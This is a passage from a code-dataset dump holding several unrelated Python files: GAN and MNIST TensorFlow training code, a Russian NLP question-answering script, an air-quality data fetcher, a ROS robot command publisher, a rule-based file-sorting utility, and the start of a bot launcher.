model_opt(d_loss, g_loss, lr, beta1)\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n log = tools.tf.DsTfLog(log_dir=log_dir, graph=sess.graph)\n\n for epoch_i in range(epoch_count):\n steps = 0\n\n for batch_images in get_batches(batch_size):\n\n steps += 1\n batch_images = batch_images * 2\n print('batche_images type:{}, shape:{} min:{} max:{}'.format(\n type(batch_images), batch_images.shape, np.min(batch_images), np.max(batch_images))\n )\n\n batch_z = np.random.uniform(-1, 1, size=(batch_size, z_dim))\n # Run optimizers\n _ = sess.run(d_opt, feed_dict={input_real: batch_images, input_z: batch_z, lr: learning_rate})\n _ = sess.run(g_opt, feed_dict={input_real: batch_images, input_z: batch_z, lr: learning_rate})\n\n if steps % 10 == 0:\n train_loss_d = d_loss.eval({input_real: batch_images, input_z: batch_z})\n train_loss_g = g_loss.eval({input_z: batch_z})\n\n print(\"Epoch {}/{}...\".format(epoch_i + 1, epochs),\n \"Batch {}...\".format(steps),\n \"Discriminator Loss: {:.4f}...\".format(train_loss_d),\n \"Generator Loss: {:.4f}\".format(train_loss_g))\n\n # if steps % 2 == 0:\n\n # show_generator_output(sess, show_n_images, input_z, data_shape[3], data_image_mode)\n cmap = None if data_image_mode == 'RGB' else 'gray'\n z_dim = input_z.get_shape().as_list()[-1]\n example_z = np.random.uniform(-1, 1, size=[show_n_images, z_dim])\n\n samples = sess.run(\n generator(input_z, data_shape[3], False),\n feed_dict={input_z: example_z}\n )\n print('samples type:{}, shape:{}, min:{}, max:{}'.format(type(samples), samples.shape, np.min(samples), np.max(samples)))\n\n images_grid = np.array(images_square_grid(samples, data_image_mode))\n print('images_grid type:{}, shape:{}, min:{}, max:{}'.format(type(images_grid), images_grid.shape, np.min(images_grid), np.max(images_grid)))\n\n log.log_images('img', images_grid.reshape(-1, *images_grid.shape), step=steps)\n\n if steps % 30 == 0:\n return\n\n def get_batch(image_files, width, height, mode):\n data_batch = np.array(\n [get_image(sample_file, width, height, mode) for sample_file in image_files]).astype(np.float32)\n\n # Make sure the images are in 4 dimensions\n if len(data_batch.shape) < 4:\n data_batch = data_batch.reshape(data_batch.shape + (1,))\n\n return data_batch\n\n class Dataset(object):\n \"\"\"\n Dataset\n \"\"\"\n\n def __init__(self, dataset_name, data_files):\n \"\"\"\n Initalize the class\n :param dataset_name: Database name\n :param data_files: List of files in the database\n \"\"\"\n DATASET_CELEBA_NAME = 'celeba'\n DATASET_MNIST_NAME = 'mnist'\n IMAGE_WIDTH = 28\n IMAGE_HEIGHT = 28\n\n if dataset_name == DATASET_CELEBA_NAME:\n self.image_mode = 'RGB'\n image_channels = 3\n\n elif dataset_name == DATASET_MNIST_NAME:\n self.image_mode = 'L'\n image_channels = 1\n\n self.data_files = data_files\n self.shape = len(data_files), IMAGE_WIDTH, IMAGE_HEIGHT, image_channels\n\n def get_batches(self, batch_size):\n \"\"\"\n Generate batches\n :param batch_size: Batch Size\n :return: Batches of data\n \"\"\"\n IMAGE_MAX_VALUE = 255\n\n current_index = 0\n while current_index + batch_size <= self.shape[0]:\n data_batch = get_batch(\n self.data_files[current_index:current_index + batch_size],\n *self.shape[1:3],\n self.image_mode\n )\n\n current_index += batch_size\n\n yield data_batch / IMAGE_MAX_VALUE - 0.5\n\n batch_size = 128\n z_dim = 100\n learning_rate = 0.0001\n beta1 = 0.5\n epochs = 1\n show_n_images = 25\n\n data_dir = './data'\n celeba_dir = os.path.join(parent_module['datas path'], 'gan_datas', 'img_align_celeba',)\n celeba_dataset = Dataset('celeba', glob.glob(os.path.join(celeba_dir, '*.jpg')))\n\n # mnist_dir = os.path.join(parent_module['datas path'], 'gan_datas', 'mnist',)\n # mnist_dataset = Dataset('mnist', glob.glob(os.path.join(mnist_dir, '*.jpg')))\n\n dts = celeba_dataset\n\n print(dts.data_files[0])\n return dts\n\n # return celeba_dataset\n\n with tf.Graph().as_default():\n train(epochs, batch_size, z_dim, learning_rate, beta1, dts.get_batches,\n dts.shape, dts.image_mode)\n\n\ndef tf_mnist():\n print('tf_mnist')\n tf.logging.set_verbosity(tf.logging.INFO)\n\n def cnn_model_fn(features, labels, mode):\n \"\"\"Model function for CNN.\"\"\"\n # Input Layer\n # Reshape X to 4-D tensor: [batch_size, width, height, channels]\n # MNIST images are 28x28 pixels, and have one color channel\n input_layer = tf.reshape(features[\"x\"], [-1, 28, 28, 1])\n\n # Convolutional Layer #1\n # Computes 32 features using a 5x5 filter with ReLU activation.\n # Padding is added to preserve width and height.\n # Input Tensor Shape: [batch_size, 28, 28, 1]\n # Output Tensor Shape: [batch_size, 28, 28, 32]\n conv1 = tf.layers.conv2d(\n inputs=input_layer,\n filters=32,\n kernel_size=[5, 5],\n padding=\"same\",\n activation=tf.nn.relu)\n\n # Pooling Layer #1\n # First max pooling layer with a 2x2 filter and stride of 2\n # Input Tensor Shape: [batch_size, 28, 28, 32]\n # Output Tensor Shape: [batch_size, 14, 14, 32]\n pool1 = tf.layers.max_pooling2d(inputs=conv1, pool_size=[2, 2], strides=2)\n\n # Convolutional Layer #2\n # Computes 64 features using a 5x5 filter.\n # Padding is added to preserve width and height.\n # Input Tensor Shape: [batch_size, 14, 14, 32]\n # Output Tensor Shape: [batch_size, 14, 14, 64]\n conv2 = tf.layers.conv2d(\n inputs=pool1,\n filters=64,\n kernel_size=[5, 5],\n padding=\"same\",\n activation=tf.nn.relu)\n\n # Pooling Layer #2\n # Second max pooling layer with a 2x2 filter and stride of 2\n # Input Tensor Shape: [batch_size, 14, 14, 64]\n # Output Tensor Shape: [batch_size, 7, 7, 64]\n pool2 = tf.layers.max_pooling2d(inputs=conv2, pool_size=[2, 2], strides=2)\n\n # Flatten tensor into a batch of vectors\n # Input Tensor Shape: [batch_size, 7, 7, 64]\n # Output Tensor Shape: [batch_size, 7 * 7 * 64]\n pool2_flat = tf.reshape(pool2, [-1, 7 * 7 * 64])\n\n # Dense Layer\n # Densely connected layer with 1024 neurons\n # Input Tensor Shape: [batch_size, 7 * 7 * 64]\n # Output Tensor Shape: [batch_size, 1024]\n dense = tf.layers.dense(inputs=pool2_flat, units=1024, activation=tf.nn.relu)\n\n # Add dropout operation; 0.6 probability that element will be kept\n dropout = tf.layers.dropout(\n inputs=dense, rate=0.4, training=mode == tf.estimator.ModeKeys.TRAIN)\n\n # Logits layer\n # Input Tensor Shape: [batch_size, 1024]\n # Output Tensor Shape: [batch_size, 10]\n logits = tf.layers.dense(inputs=dropout, units=10)\n\n predictions = {\n # Generate predictions (for PREDICT and EVAL mode)\n \"classes\": tf.argmax(input=logits, axis=1),\n # Add `softmax_tensor` to the graph. It is used for PREDICT and by the\n # `logging_hook`.\n \"probabilities\": tf.nn.softmax(logits, name=\"softmax_tensor\")\n }\n if mode == tf.estimator.ModeKeys.PREDICT:\n return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions)\n\n # Calculate Loss (for both TRAIN and EVAL modes)\n onehot_labels = tf.one_hot(indices=tf.cast(labels, tf.int32), depth=10)\n loss = tf.losses.softmax_cross_entropy(\n onehot_labels=onehot_labels, logits=logits)\n\n # Configure the Training Op (for TRAIN mode)\n if mode == tf.estimator.ModeKeys.TRAIN:\n optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.001)\n train_op = optimizer.minimize(\n loss=loss,\n global_step=tf.train.get_global_step())\n return tf.estimator.EstimatorSpec(mode=mode, loss=loss, train_op=train_op)\n\n # Add evaluation metrics (for EVAL mode)\n eval_metric_ops = {\n \"accuracy\": tf.metrics.accuracy(\n labels=labels, predictions=predictions[\"classes\"])}\n return tf.estimator.EstimatorSpec(\n mode=mode, loss=loss, eval_metric_ops=eval_metric_ops)\n\n # Load training and eval data\n # mnist = tf.contrib.learn.datasets.load_dataset(MNIST_DIR)\n from tensorflow.examples.tutorials.mnist.input_data import read_data_sets\n mnist= read_data_sets(train_dir=MNIST_DIR)\n\n train_data = mnist.train.images # Returns np.array\n train_labels = np.asarray(mnist.train.labels, dtype=np.int32)\n eval_data = mnist.test.images # Returns np.array\n eval_labels = np.asarray(mnist.test.labels, dtype=np.int32)\n\n\n # Create the Estimator\n mnist_classifier = tf.estimator.Estimator(\n model_fn=cnn_model_fn, model_dir=\"/tmp/mnist_convnet_model\")\n\n # Set up logging for predictions\n # Log the values in the \"Softmax\" tensor with label \"probabilities\"\n tensors_to_log = {\"probabilities\": \"softmax_tensor\"}\n logging_hook = tf.train.LoggingTensorHook(\n tensors=tensors_to_log, every_n_iter=50)\n\n # Train the model\n train_input_fn = tf.estimator.inputs.numpy_input_fn(\n x={\"x\": train_data},\n y=train_labels,\n batch_size=100,\n num_epochs=None,\n shuffle=True)\n\n mnist_classifier.train(\n input_fn=train_input_fn,\n steps=20000,\n hooks=[logging_hook])\n\n # Evaluate the model and print results\n eval_input_fn = tf.estimator.inputs.numpy_input_fn(\n x={\"x\": eval_data},\n y=eval_labels,\n num_epochs=1,\n shuffle=False)\n\n eval_results = mnist_classifier.evaluate(input_fn=eval_input_fn)\n\n print(eval_results)","sub_path":"DsDeepLearning/c05_GAN/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":62768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"254545552","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom json import load\nfrom json import dumps\nfrom pymystem3 import Mystem\nfrom rutermextract import TermExtractor as TE\nfrom nltk.tokenize import WordPunctTokenizer as WPT\nimport pymorphy2\n\n# Парсим текст. На вход подается текст.\ndef tokenize(sentences):\n\tarr = []\n\tmorph = pymorphy2.MorphAnalyzer()\n\tterm_extractor = TermExtractor()\n\tfor sent in nltk.sent_tokenize(sentences.lower()):\n\t\tfor term in term_extractor(sent):\n\t\t\tarr.append(term.normalized)\n\t\t\tprint (term.normalized, term.count)\n\t\tfor word in nltk.word_tokenize(sent):\n\t\t\tp = morph.parse(word)[0]\n\t\t\tv = p.tag.POS\n\t\t\tif v == 'VERB':\n\t\t\t\tarr.append(word)\n\t\t\t\tprint (word)\n\treturn arr\n\n# Попытка поиска однородных членов предложения\ndef odnorodn(term, v):\n\tif v == 'ADJF' or v == 'ADJS' or v == 'ADVB':\n\t\tif v in term:\n\t\t\tprint (v)\n\ndef compare_phrase(P1, P2):\n\tword_tokenizer = WPT()\n\n\twords1 = word_tokenizer.tokenize(P1)\n\twords2 = word_tokenizer.tokenize(P2)\n\n\tP = 1.0\n\tfor i in range(max(len(words1),len(words2))):\n\t\tp = {-1:1, 0:1, 1:1}\n\t\tfor j in p.keys():\n\t\t\ttry:\n\t\t\t\tp[j] *= compare(words1[i], words2[i+j])\n\t\t\texcept IndexError:\n\t\t\t\tp[j] = 0\n\t\tP *= max(p.values())\n\n\treturn P\n\ndef compare(S1,S2):\n\tngrams = [S1[i:i+3] for i in range(len(S1))]\n\tcount = 0\n\tfor ngram in ngrams:\n\t\tcount += S2.count(ngram)\n\n\treturn count/max(len(S1), len(S2))\n\ndef load_data(filename = 'data.json'):\n\tmystem = Mystem()\n\tknowledge = {}\n\tsignificats = {}\n\ttry:\n\t\tkb = load(open(filename))\n\t\tfor _ in kb.keys():\n\t\t\tpairs = kb[_]\n\t\t\tfor pair in pairs:\n\t\t\t\td1 = pair['denotat1']\n\t\t\t\td2 = pair['denotat2']\n\t\t\t\trl = pair['relation']\n\t\t\t\tlnk = ()\n\t\t\t\tfor d in [d1, rl, d2]:\n\t\t\t\t\tkey = ''\n\t\t\t\t\tval = []\n\t\t\t\t\tprt = ''\n\t\t\t\t\tfor a in mystem.analyze(d):\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tkey += a['analysis'][0]['lex']\n\t\t\t\t\t\t\tval += a['analysis']\n\t\t\t\t\t\t\tprt += a['analysis'][0]['lex']\n\t\t\t\t\t\texcept KeyError:\n\t\t\t\t\t\t\tkey += a['text']\n\t\t\t\t\t\t\tprt += a['text']\n\t\t\t\t\t\texcept IndexError:\n\t\t\t\t\t\t\tkey += a['text']\n\t\t\t\t\t\t\tprt += a['text']\n\t\t\t\t\tsignificats.update({key.strip('\\n'):val})\n\t\t\t\t\tlnk += tuple([prt.strip('\\n')])\n\t\t\t\ttry:\n\t\t\t\t\tknowledge[lnk] += 1\n\t\t\t\texcept KeyError:\n\t\t\t\t\tknowledge.update({lnk:1})\n\texcept FileNotFoundError as fnfe:\n\t\tpass\n\treturn [significats, knowledge]\n\ndef load_q(filename = 'test.json'):\n\ttry:\n\t\treturn load(open(filename))\n\texcept FileNotFoundError as fnfe:\n\t\treturn {}\n\ndef load_key(filename = 'key.json'):\n\ttry:\n\t\treturn load(open(filename))\n\texcept FileNotFoundError as fnfe:\n\t\treturn {}\n\ndef check_key(ans, key):\n\tc = 0\n\tw = 0\n\tfor q in key.keys():\n\t\te = False\n\t\tfor a in key[q].keys():\n\t\t\tif key[q][a] != ans[q][a][0]:\n\t\t\t\tprint(q, \"\\n\", key[q], ans[q])\n\t\t\t\te = True\n\t\tif e:\n\t\t\tw += 1\n\t\telse:\n\t\t\tc += 1\n\tprint(c, w)\n\ndef answer(knowledge = {}, questions = {}):\n\tmystem = Mystem()\n\tterm_extractor = TE()\n\n\tdef is_negative(text):\n\t\tfor a in mystem.analyze(text):\n\t\t\tfor rez in get_analysis(a):\n\t\t\t\tif (rez['gr'] == 'PART=' and rez['lex'] == 'не'):\n\t\t\t\t\treturn -1\n\t\treturn 1\n\n\tdef get_analysis(mystem_result):\n\t\t\ttry:\n\t\t\t\treturn mystem_result['analysis']\n\t\t\texcept KeyError:\n\t\t\t\treturn []\n\n\n\tdef get_significat_keys(terms):\n\t\tsignificat_keys = ()\n\t\tfor term in terms:\n\t\t\tsignificat_key = ''\n\t\t\tfor analysis in mystem.analyze(term):\n\t\t\t\tfor rez in get_analysis(analysis):\n\t\t\t\t\ttry:\n\t\t\t\t\t\tsignificat_key += rez['lex'] + \" \"\n\t\t\t\t\texcept KeyError:\n\t\t\t\t\t\tsignificat_key += rez['text'] + \" \"\n\t\t\tsignificat_keys += tuple([significat_key.strip()])\n\t\treturn significat_keys\n\n\tdef get_real_keys(significat_keys):\n\t\treal_keys = []\n\t\tfor search_key in significat_keys:\n\t\t\tfor real_key in knowledge[0].keys():\n\t\t\t\tk = compare_phrase(search_key, real_key)\n\t\t\t\tif k > 0.55:\n\t\t\t\t\treal_keys += [real_key]\n\n\t\treturn real_keys\n\n\tdef find_kb_keys(real_keys):\n\t\tfound_keys = []\n\t\tfound_keys = []\n\t\tfor rel in knowledge[1].keys():\n\t\t\tfor key in real_keys:\n\t\t\t\ttry:\n\t\t\t\t\trel.index(key)\n\t\t\t\t\tfound_keys += [rel]\n\t\t\t\texcept ValueError:\n\t\t\t\t\tpass\n\t\t\tif len(found_keys) >= len(real_keys):\n\t\t\t\tbreak\n\t\treturn found_keys\n\n\tans = {}\n\tfor q in questions.keys():\n\t\tans.update({q:{}})\n\t\tfor a in questions[q].keys():\n\t\t\ttext = q + ' ' + questions[q][a]\n\t\t\tterms = [str(term) for term in term_extractor(text)]\n\t\t\tneg = is_negative(text)\n\t\t\tsignificat_keys = get_significat_keys(terms)\n\t\t\treal_keys = get_real_keys(significat_keys)\n\t\t\tfound_keys = find_kb_keys(real_keys)\n\t\t\t# print(\"%s) %s\\n%s\\nt %s\\nsk %s\\nrk %s\\nfk %s\" % (a, text, neg, terms, significat_keys, real_keys, found_keys))\n\n\n\t\t\tans[q].update({a:[neg * len(found_keys), questions[q][a], found_keys]})\n\t\t\t#.update({})\n\t\tmax = ['', -100]\n\t\tfor a in ans[q].keys():\n\t\t\tif ans[q][a][0] > max[1]:\n\t\t\t\tmax[1] = ans[q][a][0]\n\t\t\t\tmax[0] = a\n\t\tfor a in ans[q].keys():\n\t\t\tif a == max[0]:\n\t\t\t\tans[q][a][0] = 1\n\t\t\telse:\n\t\t\t\tans[q][a][0] = 0\n\t\t# print(max)\n\treturn ans\n\ndef to_graph(data):\n\twith open('graph.dot', 'w') as g:\n\t\tg.write('digraph g {\\n')\n\t\tfor k in data.keys():\n\t\t\tg.write('\"%s\" -> \"%s\" [label=\"%s\"]' % (k[0], k[2], k[1]))\n\t\tg.write('}\\n')\n\t\tg.close()\n\nif __name__ == '__main__':\n\timport sys\n\tdata = load_data('data.json')\n\tto_graph(data[1])\n\tq = load_q('test.json')\n\ta = answer(data,q)\n\tprint(dumps(a, indent = 4, ensure_ascii = 0))\n\tk = load_key('key.json')\n\tcheck_key(a, k)\n\t# Вызов парсера\n\ttokenize(u'Красивая и загадочная Оля написала и отправила мне длинное и информативное сообщение и письмо.')\n","sub_path":"q.py","file_name":"q.py","file_ext":"py","file_size_in_byte":5489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"281231575","text":"from datetime import timedelta\n\nimport pandas as pd\nimport requests\n\nfrom config import configuration\nfrom date import date_to_str\nfrom kafka_client import KafkaWithoutRegistry\nfrom utils import get_valid_devices\n\n\"\"\"\n:Api Documentation: https://api-guide.clarity.io/\n\"\"\"\n\n\nclass KccaBatchFetch:\n\n def __init__(self):\n self.kafka_client = KafkaWithoutRegistry(boot_strap_servers=configuration.BOOT_STRAP_SERVERS,\n topic=configuration.OUTPUT_TOPIC)\n self.devices = get_valid_devices(configuration.AIRQO_BASE_URL, \"kcca\")\n self.device_codes_str = self.__get_devices_codes()\n super().__init__()\n\n def begin_fetch(self):\n interval = f\"{configuration.BATCH_FETCH_TIME_INTERVAL}H\"\n\n dates = pd.date_range(configuration.START_TIME, configuration.END_TIME, freq=interval)\n\n for date in dates:\n start_time = date_to_str(date)\n end_time = date_to_str(date + timedelta(hours=int(configuration.BATCH_FETCH_TIME_INTERVAL)))\n\n print(start_time + \" : \" + end_time)\n\n measurements = self.__get_measurements(start_time, end_time)\n\n measurements_df = pd.DataFrame(measurements)\n\n if measurements_df.empty:\n print(\"No Data at the moment\")\n print(measurements_df)\n continue\n\n transformed_data = []\n for _, row in measurements_df.iterrows():\n\n measurement = row.to_dict()\n transformed_data.append(measurement)\n\n if transformed_data:\n self.kafka_client.produce(transformed_data)\n\n def __get_measurements(self, start_time, end_time):\n\n api_url = f\"{configuration.CLARITY_API_BASE_URL}measurements?\" \\\n f\"startTime={start_time}&endTime={end_time}&code={self.device_codes_str}\"\n\n # frequency = configuration.FREQUENCY.strip().lower()\n # if frequency == \"hour\":\n # api_url = f\"{api_url}&average=hour\"\n # elif frequency == \"day\":\n # api_url = f\"{api_url}&average=day\"\n # else:\n # pass\n\n headers = {'x-api-key': configuration.CLARITY_API_KEY, 'Accept-Encoding': 'gzip'}\n results = requests.get(api_url, headers=headers)\n if results.status_code != 200:\n print(f\"{results.content}\")\n return []\n return results.json()\n\n def __get_devices_codes(self):\n\n device_data = list(self.devices)\n\n device_codes = \"\"\n\n for device in device_data:\n device_data = dict(device)\n device_codes = device_codes + f\"{device_data.get('name')},\"\n\n return device_codes[:-1]\n","sub_path":"src/data-mgt/python/batch-jobs/kcca_batch_fetch.py","file_name":"kcca_batch_fetch.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"252591375","text":"from geometry_msgs.msg import Twist\n\n\nclass CommandPublisher(object):\n \"\"\" Class for robot commands publishing:\n\n Attributes:\n publisher: ROS publisher\n wheel_distance: distance between wheels centers\n max_speed: maximally achievable linear speed\n indicator_linear: speed index as a percentage of maximum linear speed\n linear_speed = (indicator_linear / 100) * max_speed\n indicator_angular: speed index as a percentage of maximum angular speed\n angular_speed = (indicator_angular) / 100 * \\\n (max_speed_linear / (wheel_distance / 2)\n \"\"\"\n\n def __init__(self, publisher, wheel_distance=0.27, max_speed=0.8,\n indicator_linear=50, indicator_angular=50):\n self.publisher = publisher\n self.direction_linear = 0\n self.direction_angular = 0\n self.count = 0\n self.indicator_linear = indicator_linear\n self.indicator_angular = indicator_angular\n self.max_speed_linear = max_speed\n self.gas = False\n self.reverse = False\n self.left = False\n self.right = False\n self.increase_speed = False\n self.decrease_speed = False\n self.increase_angle_speed = False\n self.decrease_angle_speed = False\n self.speed_linear = 0\n self.speed_angular = 0\n self.wheel_distance = wheel_distance\n self.control_speed = 0\n self.control_turn = 0\n\n def publish_command(self):\n \"\"\" Function updates commands states and publish ROS Twist message\n \"\"\"\n self.update()\n self.publisher.publish(self.get_twist())\n\n def get_twist(self):\n \"\"\" Function retuns ROS Twist message\n \"\"\"\n twist = Twist()\n twist.linear.x = self.control_speed\n twist.linear.y = 0\n twist.linear.z = 0\n twist.angular.x = 0\n twist.angular.y = 0\n twist.angular.z = self.control_turn\n return twist\n\n def set_indicator_linear(self, value):\n \"\"\" Function set new linear indicator value\n\n :param value: new indicator value\n :type value: int\n\n \"\"\"\n self.indicator_linear = value\n\n def set_indicator_angular(self, value):\n \"\"\" Function set new angular indicator value\n\n :param value: new indicator value\n :type value: int\n\n \"\"\"\n self.indicator_angular = value\n\n def update(self):\n \"\"\" Function updates commands states and calculate control linear\n and angular speeds\n \"\"\"\n if self.gas or self.reverse or self.left or self.right:\n if self.gas:\n self.direction_linear = 1\n elif self.reverse:\n self.direction_linear = -1\n else:\n self.direction_linear = 0\n\n if self.left:\n self.direction_angular = 1\n elif self.right:\n self.direction_angular = -1\n else:\n self.direction_angular = 0\n\n self.count = 0\n else:\n self.count += 1\n if self.count >= 2:\n self.direction_linear = 0\n self.direction_angular = 0\n\n if self.increase_speed and self.indicator_linear < 100:\n self.indicator_linear += 2\n if self.decrease_speed and self.indicator_linear > 0:\n self.indicator_linear -= 2\n\n if self.increase_angle_speed and self.indicator_angular < 100:\n self.indicator_angular += 2\n if self.decrease_angle_speed and self.indicator_angular > 0:\n self.indicator_angular -= 2\n\n self.speed_linear = float(\n self.indicator_linear) / 100 * self.max_speed_linear\n self.speed_angular = float(\n self.indicator_angular) / 100 * (self.max_speed_linear / (self.wheel_distance / 2))\n target_speed = self.speed_linear * self.direction_linear\n target_turn = self.speed_angular * self.direction_angular\n\n if target_speed > self.control_speed:\n self.control_speed = min(target_speed, self.control_speed + 0.05)\n elif target_speed < self.control_speed:\n self.control_speed = max(target_speed, self.control_speed - 0.05)\n else:\n self.control_speed = target_speed\n\n if target_turn > self.control_turn:\n self.control_turn = min(target_turn, self.control_turn + 0.5)\n elif target_turn < self.control_turn:\n self.control_turn = max(target_turn, self.control_turn - 0.5)\n else:\n self.control_turn = target_turn\n","sub_path":"plato_control/src/publish_cmd_vel.py","file_name":"publish_cmd_vel.py","file_ext":"py","file_size_in_byte":4634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"433607286","text":"\"\"\"\nManagerie.py | Jackson Callaghan | Sep 2018\n\nManagerie 2.0 - sorts through files according to basic rules, and does not prompt user for permission to delete or move\nfiles. See readme for information.\n\n\"\"\"\n\nimport os\nimport configparser\nimport shutil\nimport re\nimport time\nimport logging\n\n\nclass rule:\n\n def __init__(self, name, type, matchtype, match, targetfolder=None):\n self.name = name\n self.type = type\n self.matchtype = matchtype\n self.match = match\n self.targetfolder = targetfolder\n\n def __str__(self):\n return \"{}: {}, {}, {}, {}\".format(self.name, self.type, self.matchtype, self.match, self.targetfolder)\n\n def prep_regex(self):\n if self.matchtype == \"regex\":\n temp = self.match\n self.match = re.compile(temp)\n\nclass sorter:\n\n def __init__(self):\n self.config = configparser.ConfigParser() # makes config object, when read works like list\n self.debug = False # saves debug information to log file\n self.sortdir = \"\"\n self.rules = []\n self.contents = None\n\n self.numbered_file = re.compile(\".*\\([0-9]*\\)\") # regex for a numbered file (windows duplicate format)\n self.number_splitter = re.compile(\"\\([0-9]*\\)\") # regex that matches number of file for removal\n\n open('managerie_log.txt', 'w').close() # opens and closes file to make sure it exists\n logging.basicConfig(filename='managerie_log.txt', level=logging.DEBUG) # sets up log file\n logging.debug(\"Debug Log File Established.\")\n stderrLogger = logging.StreamHandler() # creates stream handler that pipes log entries to stdout (console)\n stderrLogger.setFormatter(logging.Formatter(logging.BASIC_FORMAT)) # sets basic logging format\n logging.getLogger().addHandler(stderrLogger) # adds handler to logger\n\n logging.info(\"Debug Stream Established.\")\n\n try:\n self.get_rules()\n except (FileNotFoundError, KeyError):\n self.unexpected_exit(\"Please create a config file in script directory according to readme.\")\n\n logging.debug(\"Got rules:\")\n for x in self.rules:\n logging.debug(x)\n\n def sort(self):\n logging.debug(\"Attempting to scan directory {}\".format(self.sortdir))\n try:\n with os.scandir(self.sortdir) as contents: # scans given directory and outputs contents\n self.contents = [i for i in contents] # converts (?) to list format and stores\n for item in self.contents:\n self.runrules(item, self.contents)\n logging.debug(\"\")\n except FileNotFoundError:\n self.unexpected_exit(\"Sort directory does not exist\")\n logging.debug(\"Sort Complete!\")\n\n def get_rules(self): # reads file and populates list of rules to follow\n self.config.read(\"Managerie.ini\") # reads file into config object\n self.debug = self.config[\"SETTINGS\"][\"Debug\"] # checks if debug is active\n self.sortdir = self.config[\"SETTINGS\"][\"Sort Directory\"] # grabs sort directory\n\n for key, item in enumerate(self.config[\"RULES\"]): # loops through rule part of config\n rule_parse = [x.strip() for x in self.config[\"RULES\"][item].split(',')] # splits comma-separated parts and strips spaces\n logging.debug(\"Grabbed Rule {}:{}\".format(item, rule_parse))\n name = item\n type = rule_parse[0]\n targetfolder = None if type != \"move\" else rule_parse[1]\n matchtype = rule_parse[1 if type != \"move\" else 2]\n if matchtype in (\"regex\", \"condition\"):\n match = \"\".join(rule_parse[2 if type != \"move\" else 3:])\n else:\n match = rule_parse[2 if type != \"move\" else 3:]\n self.rules.append(rule(name, type, matchtype, match, targetfolder)) # creates rules\n\n # config should have deletion rules in the following format:\n # Name = matchtype, match_arg\n\n # config should have sorting rules in the following format:\n # Name = targetfolder, matchtype, match_arg\n\n def is_duplicate(self, file, target=None): # checks if file has duplicate in target location, DELETES if true\n logging.debug(\"Checking if file {} is duplicate...\".format(file.name))\n if target is not None: # checks if there's a target location to check\n with os.scandir(self.sortdir) as contents: # opens target location and scans files into list of file objects\n if re.split(self.number_splitter, file.name)[0] in [os.path.splitext(i.name)[0] for i in contents]:\n self.delfile(file)\n return True\n elif self.numbered_file.match(file.name): # checks if file is a numbered file\n if re.split(self.number_splitter, file.name)[0] in [os.path.splitext(i.name)[0] for i in self.contents]:\n self.delfile(file)\n return True\n else:\n return False\n\n def move(self, file, target): # moves file to target location, or deletes if duplicate in location\n if not self.is_duplicate(file, target):\n if not os.path.isdir(target): # checks if path exists\n logging.warning(\"Target folder does not exist. Creating folder....\")\n os.mkdir(target) # creates path if it does not\n shutil.move(file.path, target + '/' + file.name) # attempts to rename file to target path + filename\n\n def delfile(self, file): # deletes file or folder\n if file.is_file():\n os.remove(file.path)\n else:\n shutil.rmtree(file.path)\n\n def resolve(self, file, rule): # decides whether to move or delete file based on rule\n if rule.type == \"del\":\n logging.debug(\"File {} matches deletion rule {}. Deleting...\".format(file.name, rule.name))\n self.delfile(file)\n return \"deleted\"\n elif rule.type == \"move\":\n logging.debug(\"File {} matches sorting rule {}. Moving...\".format(file.name, rule.name))\n self.move(file, rule.targetfolder)\n return \"moved\"\n\n def runrules(self, file, contents): # runs a file through all rules to find appropriate action\n if file.name in (\"Managerie.ini\", \"Managerie.py\"):\n logging.debug(\"File is Managerie-critical file. Skipping...\")\n return \"Ignored\"\n if file.name == \"managerie_log.txt\":\n logging.debug(\"File is managerie log. {}...\".format(\"Deleting\" if not self.debug else \"Skipping\"))\n if self.debug:\n return \"Ignored\"\n else:\n self.delfile(file)\n\n if self.is_duplicate(file): # checks if file is duplicate\n logging.debug(\"File is duplicate in directory. Deleting...\")\n return \"Deleted\"\n\n logging.debug(\"Attempting to match file {} to rule...\".format(file.name))\n for rule in self.rules: # checks if file matches sorting rule\n if rule.matchtype == \"regex\":\n if re.compile(rule.match).match(file.name): # checks against given regex\n return self.resolve(file, rule)\n elif rule.matchtype == \"list\":\n if any(True if x.lower() in file.name.lower() else False for x in rule.match): # checks if file has any keywords in it\n return self.resolve(file, rule)\n elif rule.matchtype == \"condition\":\n try:\n if eval(rule.match): # evaluates code given by config for checking arbitrary conditions\n return self.resolve(file, rule)\n except:\n logging.debug(\"Conditional code failed. Skipping...\")\n continue\n elif rule.matchtype == \"regex_list\":\n if any(True if re.compile(x).match(file.name) else False for x in rule.match):\n return self.resolve(file, rule)\n\n def unexpected_exit(self, msg): # logs error and exits after waiting long enough for user to read error\n logging.error(msg)\n time.sleep(5)\n exit()\n\n\nmysorter = sorter()\nmysorter.sort()\n","sub_path":"Managerie.py","file_name":"Managerie.py","file_ext":"py","file_size_in_byte":8273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"41541434","text":"import argparse\nimport sys\n\n\nclass Launcher:\n def __init__(self):\n parser = argparse.ArgumentParser(description='WalBot', formatter_class=argparse.RawTextHelpFormatter)\n parser.add_argument(\"action\", choices=[x for x in dir(self) if not x.startswith('_')], help='Action for bot')\n parser.add_argument(\"--fast_start\", action=\"store_true\",\n help=\"Disable some things to make bot start faster:\\n\" +\n \"- Disable Markov model check on start\\n\")\n parser.add_argument(\"--patch\", action=\"store_true\",\n help=\"Call script for patching config files before starting the bot\")\n if sys.platform in (\"linux\", \"darwin\"):\n parser.add_argument(\"--nohup\", action=\"store_true\", help=\"Ignore SIGHUP and redirect output to nohup.out\")\n self.args = parser.parse_args()\n getattr(self, self.args.action)()\n\n def start(self):\n \"\"\"Start the bot\"\"\"\n __import__(\"src.bot\", fromlist=['object']).start(self.args)\n\n def stop(self):\n \"\"\"Stop the bot\"\"\"\n __import__(\"src.bot\", fromlist=['object']).stop()\n\n def restart(self):\n \"\"\"Restart the 